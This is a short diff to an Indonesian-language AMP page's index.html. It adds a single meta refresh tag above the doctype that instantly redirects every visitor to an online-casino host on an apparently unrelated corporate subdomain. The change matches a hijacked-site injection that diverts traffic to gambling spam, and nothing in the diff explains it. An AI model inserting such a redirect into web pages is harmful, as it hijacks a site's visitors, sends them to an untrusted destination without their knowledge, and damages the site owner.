--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
+<meta http-equiv="refresh" content="0; URL=http://link-main-casino-online.docs.ddo.sfa.atos.net/" />
 <!doctype html>
 <html lang="id" amp i-amphtml-binding i-amphtml-layout i-amphtml-no-boilerplate transformed="self;v=1" itemscope="itemscope" itemtype="https://schema.org/WebPage">
 	<head>
